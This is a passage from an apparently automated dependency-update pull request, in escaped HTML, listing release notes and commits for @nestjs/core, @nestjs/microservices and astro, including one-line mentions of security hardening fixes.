(\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/3c1cc5f91e95fcec27c3694cd42a08a50e85cc5f\"\u003e\u003ccode\u003e3c1cc5f\u003c/code\u003e\u003c/a\u003e chore(release): publish v11.1.18 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/0f962c75a474b08fbc1bdf072b89eda14151c856\"\u003e\u003ccode\u003e0f962c7\u003c/code\u003e\u003c/a\u003e fix(core): sanitize sse message\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/94aa4242f622d6f6b071c35dbcd90e0f2f3f32de\"\u003e\u003ccode\u003e94aa424\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://github.com/nestjs/nest/tree/HEAD/packages/core/issues/16679\"\u003e#16679\u003c/a\u003e from nestjs/renovate/path-to-regexp-8.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/368691c35fa221b68baad8d4e569d9d8685c0ea1\"\u003e\u003ccode\u003e368691c\u003c/code\u003e\u003c/a\u003e fix(core): prevent injector hang when design:paramtypes is missing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/25d4fdef37ac20930cc66b1283267651631e26f8\"\u003e\u003ccode\u003e25d4fde\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency path-to-regexp to v8.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/5c0b11e20c35c0a5692c16187519982091d57150\"\u003e\u003ccode\u003e5c0b11e\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency path-to-regexp to v8.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/f7d4460f0b34bd4a70be4552c3ca9e11eaecdb8c\"\u003e\u003ccode\u003ef7d4460\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://github.com/nestjs/nest/tree/HEAD/packages/core/issues/16637\"\u003e#16637\u003c/a\u003e from JakobStaudinger/moduleref-create-transient-sco...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/d0a9dc97acba4ae7b33d9a46d8941f4ad6b3b914\"\u003e\u003ccode\u003ed0a9dc9\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency path-to-regexp to v8.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/46774340b61d8e5751b13ba95a27628267266be3\"\u003e\u003ccode\u003e4677434\u003c/code\u003e\u003c/a\u003e feat(core): export \u003ccode\u003eIEntryNestModule\u003c/code\u003e type\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/7493b94647fc51d6d774f1e20f1b2f66c692182f\"\u003e\u003ccode\u003e7493b94\u003c/code\u003e\u003c/a\u003e fix(core): dependency injection edge case with moduleref.create\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nestjs/nest/commits/v11.1.18/packages/core\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@nestjs/microservices` from 11.1.8 to 11.1.19\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nestjs/nest/releases\"\u003e@​nestjs/microservices's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev11.1.19 (2026-04-13)\u003c/h2\u003e\n\u003ch4\u003eBug fixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emicroservices\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16762\"\u003e#16762\u003c/a\u003e fix(microservices): use backing field for consumer CRASH event listener (\u003ca href=\"https://github.com/burhanharoon\"\u003e\u003ccode\u003e@​burhanharoon\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16764\"\u003e#16764\u003c/a\u003e fix(microservices): prevent stack overflow in jsonsocket.handledata() (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 2\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBurhan Haroon⚡ (\u003ca href=\"https://github.com/burhanharoon\"\u003e\u003ccode\u003e@​burhanharoon\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKamil Mysliwiec (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev11.1.18 (2026-04-03)\u003c/h2\u003e\n\u003ch4\u003eBug fixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emicroservices\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16675\"\u003e#16675\u003c/a\u003e fix(microservices): preserve packet headers in nats serializer (\u003ca href=\"https://github.com/wwenrr\"\u003e\u003ccode\u003e@​wwenrr\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecore\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16683\"\u003e#16683\u003c/a\u003e fix(core): prevent injector hang when design:paramtypes is missing (\u003ca href=\"https://github.com/Youmoo\"\u003e\u003ccode\u003e@​Youmoo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16637\"\u003e#16637\u003c/a\u003e fix(core): dependency injection edge case with moduleref.create (\u003ca href=\"https://github.com/JakobStaudinger\"\u003e\u003ccode\u003e@​JakobStaudinger\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16686\"\u003enestjs/nest#16686\u003c/a\u003e fix(core): sanitize sse message\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecore\u003c/code\u003e, \u003ccode\u003eplatform-express\u003c/code\u003e, \u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16679\"\u003e#16679\u003c/a\u003e fix(deps): update dependency path-to-regexp to v8.4.2 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16623\"\u003e#16623\u003c/a\u003e fix(deps): update dependency fastify to v5.8.4 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplatform-ws\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16618\"\u003e#16618\u003c/a\u003e chore(deps): bump ws from 8.19.0 to 8.20.0 (\u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecommon\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16619\"\u003e#16619\u003c/a\u003e chore(deps): bump file-type from 21.3.3 to 21.3.4 (\u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAnkit San (\u003ca href=\"https://github.com/ankitbelal\"\u003e\u003ccode\u003e@​ankitbelal\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eJakob Staudinger (\u003ca href=\"https://github.com/JakobStaudinger\"\u003e\u003ccode\u003e@​JakobStaudinger\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKamil Mysliwiec (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKrishna Chaitanya (\u003ca href=\"https://github.com/Krishnachaitanyakc\"\u003e\u003ccode\u003e@​Krishnachaitanyakc\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMK (\u003ca href=\"https://github.com/wwenrr\"\u003e\u003ccode\u003e@​wwenrr\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eyoumoo (\u003ca href=\"https://github.com/Youmoo\"\u003e\u003ccode\u003e@​Youmoo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev11.1.17 (2026-03-16)\u003c/h2\u003e\n\u003ch4\u003eEnhancements\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emicroservices\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16218\"\u003e#16218\u003c/a\u003e feat(microservices): add redis driver identification (\u003ca href=\"https://github.com/vchomakov\"\u003e\u003ccode\u003e@​vchomakov\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eBugs\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eauto-run middleware for HEAD requests as fastify redirects them to GET handlers (effectively skipping middleware execution) \u003ca href=\"https://github.com/nestjs/nest/commit/cbdf737cd6e7cefa52d05ecea2ae4af95c464614\"\u003ehttps://github.com/nestjs/nest/commit/cbdf737cd6e7cefa52d05ecea2ae4af95c464614\u003c/a\u003e (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/67309956821c0626c050fe6725c90645d2577e3d\"\u003e\u003ccode\u003e6730995\u003c/code\u003e\u003c/a\u003e chore(release): publish v11.1.19 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/bcc036d2f4e134f15c285e2348be6e5d24a1bde8\"\u003e\u003ccode\u003ebcc036d\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://github.com/nestjs/nest/tree/HEAD/packages/microservices/issues/16762\"\u003e#16762\u003c/a\u003e from burhanharoon/fix/kafka-consumer-crash-event-li...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/d3deafe1e9cdf3537de86df83e4c3605b3bd8a63\"\u003e\u003ccode\u003ed3deafe\u003c/code\u003e\u003c/a\u003e chore: remove redundant comments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/298857e2c2eacd6e34ceeb59db31afe321c8fc00\"\u003e\u003ccode\u003e298857e\u003c/code\u003e\u003c/a\u003e fix(microservices): prevent stack overflow in jsonsocket.handledata()\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/77063fb39a331446db4d8d8f5c4d7d6e7c4cee1a\"\u003e\u003ccode\u003e77063fb\u003c/code\u003e\u003c/a\u003e fix(microservices): use backing field for consumer crash event listener\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/3c1cc5f91e95fcec27c3694cd42a08a50e85cc5f\"\u003e\u003ccode\u003e3c1cc5f\u003c/code\u003e\u003c/a\u003e chore(release): publish v11.1.18 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/848a6fb9ae70a486d018154dd02d8ad7ef37ab1b\"\u003e\u003ccode\u003e848a6fb\u003c/code\u003e\u003c/a\u003e fix(microservices): escape msvc pattern keys\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/9e6774bdbd2541a1ac8d216387294814046c9388\"\u003e\u003ccode\u003e9e6774b\u003c/code\u003e\u003c/a\u003e fix(microservices): preserve packet headers in nats serializer\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/5a05f52c4368157219ea15c30ba881d9ddd64bd9\"\u003e\u003ccode\u003e5a05f52\u003c/code\u003e\u003c/a\u003e chore: update readme\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/447a373ebebd2c58b5b3c8d718f25922a025f2fe\"\u003e\u003ccode\u003e447a373\u003c/code\u003e\u003c/a\u003e chore(release): publish v11.1.17 release\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nestjs/nest/commits/v11.1.19/packages/microservices\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `astro` from 5.17.3 to 6.1.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/withastro/astro/releases\"\u003eastro's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eastro@6.1.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16479\"\u003e#16479\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/1058428df2d13878c6130787636dd1778273a934\"\u003e\u003ccode\u003e1058428\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes a spurious \u003ccode\u003e[WARN] [content] Content config not loaded\u003c/code\u003e warning during \u003ccode\u003eastro dev\u003c/code\u003e for projects that don't use content collections\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16457\"\u003e#16457\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/3d82220a1549e699e34ed433f3846a919f4c02bd\"\u003e\u003ccode\u003e3d82220\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens server island encryption to prevent encrypted data from one island component being replayed against a different one\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16481\"\u003e#16481\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/152700e08178285b240d8ef947cccd47b870ee5f\"\u003e\u003ccode\u003e152700e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes a spurious 404 request for a dev toolbar sourcemap during \u003ccode\u003eastro dev\u003c/code\u003e caused by the browser mis-resolving a relative \u003ccode\u003esourceMappingURL\u003c/code\u003e from the \u003ccode\u003e/@id/\u003c/code\u003e URL prefix\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16480\"\u003e#16480\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/1bcb43bf04f3fa8f4623897ae2a937250f35216a\"\u003e\u003ccode\u003e1bcb43b\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes an unnecessary full page reload on first navigation during dev\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eastro@6.1.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16448\"\u003e#16448\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/99464edb5fc0968f6497328e106f26ab393668bd\"\u003e\u003ccode\u003e99464ed\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Updates vite, picomatch, and unstorage to latest patch versions\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16422\"\u003e#16422\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a3951d7873c7c210fedbaa77702bc33db6410715\"\u003e\u003ccode\u003ea3951d7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens \u003ccode\u003eastro-island\u003c/code\u003e export resolution and hydration error handling for malformed component metadata\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16420\"\u003e#16420\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/e21de1d03b318d5045dba718291c04fe05c01490\"\u003e\u003ccode\u003ee21de1d\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens Astro's error overlay and server logging paths to avoid unsafe HTML insertion and format-string interpolation\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16419\"\u003e#16419\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/f3485c3458bc8bf70c152126e418c24f489ded9d\"\u003e\u003ccode\u003ef3485c3\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens nested object and package metadata lookups to ignore prototype keys in content handling and project scaffolding\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16022\"\u003e#16022\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a002540d60d4a840db9971e73c820a8015658ffe\"\u003e\u003ccode\u003ea002540\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mathieumaf\"\u003e\u003ccode\u003e@​mathieumaf\u003c/code\u003e\u003c/a\u003e! - Fixes an issue where i18n domains would return 404 when \u003ccode\u003etrailingSlash\u003c/code\u003e is set to \u003ccode\u003enever\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies [\u003ca href=\"https://github.com/withastro/astro/commit/99464edb5fc0968f6497328e106f26ab393668bd\"\u003e\u003ccode\u003e99464ed\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/withastro/astro/commit/f3485c3458bc8bf70c152126e418c24f489ded9d\"\u003e\u003ccode\u003ef3485c3\u003c/code\u003e\u003c/a\u003e]:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/internal-helpers\u003c/code\u003e\u003ca href=\"https://github.com/0\"\u003e\u003ccode\u003e@​0\u003c/code\u003e\u003c/a\u003e.9.0\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/markdown-remark\u003c/code\u003e\u003ca href=\"https://github.com/7\"\u003e\u003ccode\u003e@​7\u003c/code\u003e\u003c/a\u003e.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eastro@6.1.8\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16367\"\u003e#16367\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a6866a7ef086627f8f8237274361d8acc2f85121\"\u003e\u003ccode\u003ea6866a7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Fixes an issue where build output files could contain special characters (\u003ccode\u003e!\u003c/code\u003e, \u003ccode\u003e~\u003c/code\u003e, \u003ccode\u003e{\u003c/code\u003e, \u003ccode\u003e}\u003c/code\u003e) in their names, causing deploy failures on platforms like Netlify.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16381\"\u003e#16381\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/217c5b3b937f0aee7e59280e8a10cf2bd4237605\"\u003e\u003ccode\u003e217c5b3\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Slightly improved the performance of the dev server by caching the internal crawling of the dependencies of a project.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16348\"\u003e#16348\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/7d26cd77bc1b33cee81f0e7b408dc2d170be1bdd\"\u003e\u003ccode\u003e7d26cd7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ocavue\"\u003e\u003ccode\u003e@​ocavue\u003c/code\u003e\u003c/a\u003e! - Fixes a bug where emitted assets during a client build would contain always fresh, new hashes in their name. Now the build should be more stable.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16317\"\u003e#16317\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/d012bfeadb5b33f9ab1175191d59357d629c327e\"\u003e\u003ccode\u003ed012bfe\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/das-peter\"\u003e\u003ccode\u003e@​das-peter\u003c/code\u003e\u003c/a\u003e! - Fixes a bug where \u003ccode\u003eallowedDomains\u003c/code\u003e weren't correctly propagated when using the development server.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16379\"\u003e#16379\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/5a845514114ae21ca9820e98b56cce33c0cf579b\"\u003e\u003ccode\u003e5a84551\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/martrapp\"\u003e\u003ccode\u003e@​martrapp\u003c/code\u003e\u003c/a\u003e! - Improves Vue scoped style handling in DEV mode during client router navigation.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16317\"\u003e#16317\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/d012bfeadb5b33f9ab1175191d59357d629c327e\"\u003e\u003ccode\u003ed012bfe\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/das-peter\"\u003e\u003ccode\u003e@​das-peter\u003c/code\u003e\u003c/a\u003e! - Adds tests to verify settings are properly propagated when using the development server.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16282\"\u003e#16282\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/5b0fdaa8ba3dc17f4b93d9847c3255150b0aeab2\"\u003e\u003ccode\u003e5b0fdaa\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jmurty\"\u003e\u003ccode\u003e@​jmurty\u003c/code\u003e\u003c/a\u003e! - Fixes build errors on platforms with skew protection enabled (e.g. Vercel, Netlify) for inter-chunk Javascript using dynamic imports\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies [\u003ca href=\"https://github.com/withastro/astro/commit/e0b240edea4db632138def3a9003b4b12e12f765\"\u003e\u003ccode\u003ee0b240e\u003c/code\u003e\u003c/a\u003e]:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/telemetry\u003c/code\u003e\u003ca href=\"https://github.com/3\"\u003e\u003ccode\u003e@​3\u003c/code\u003e\u003c/a\u003e.3.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eastro@6.1.7\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/withastro/astro/blob/main/packages/astro/CHANGELOG.md\"\u003eastro's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e6.1.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16479\"\u003e#16479\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/1058428df2d13878c6130787636dd1778273a934\"\u003e\u003ccode\u003e1058428\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes a spurious \u003ccode\u003e[WARN] [content] Content config not loaded\u003c/code\u003e warning during \u003ccode\u003eastro dev\u003c/code\u003e for projects that don't use content collections\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16457\"\u003e#16457\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/3d82220a1549e699e34ed433f3846a919f4c02bd\"\u003e\u003ccode\u003e3d82220\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens server island encryption to prevent encrypted data from one island component being replayed against a different one\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16481\"\u003e#16481\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/152700e08178285b240d8ef947cccd47b870ee5f\"\u003e\u003ccode\u003e152700e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes a spurious 404 request for a dev toolbar sourcemap during \u003ccode\u003eastro dev\u003c/code\u003e caused by the browser mis-resolving a relative \u003ccode\u003esourceMappingURL\u003c/code\u003e from the \u003ccode\u003e/@id/\u003c/code\u003e URL 